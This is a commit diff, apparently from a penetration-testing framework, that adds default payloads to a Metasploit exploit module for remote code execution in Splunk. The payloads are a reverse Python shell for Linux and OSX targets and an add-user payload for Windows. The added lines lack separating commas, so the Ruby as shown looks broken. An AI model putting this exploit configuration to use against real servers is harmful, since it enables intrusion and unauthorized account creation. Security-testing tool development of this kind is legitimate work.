Update splunk_upload_app_exec.rb

master
Matteo Malvica 2019-03-18 15:11:04 +01:00 committed by GitHub
parent f6e9410d87
commit 2f1ee95073
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions

View File

@ -49,18 +49,21 @@ class MetasploitModule < Msf::Exploit::Remote
{ {
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => %w(linux unix) 'Platform' => %w(linux unix)
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
} }
], ],
[ 'Splunk >= 7.2.4 / Windows', [ 'Splunk >= 7.2.4 / Windows',
{ {
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => 'win' 'Platform' => 'win'
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'}
} }
], ],
[ 'Splunk >= 7.2.4 / OSX', [ 'Splunk >= 7.2.4 / OSX',
{ {
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => %w(linux unix) 'Platform' => %w(linux unix)
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'}
} }
], ],
[ 'Splunk >= 5.0.1 / Linux', [ 'Splunk >= 5.0.1 / Linux',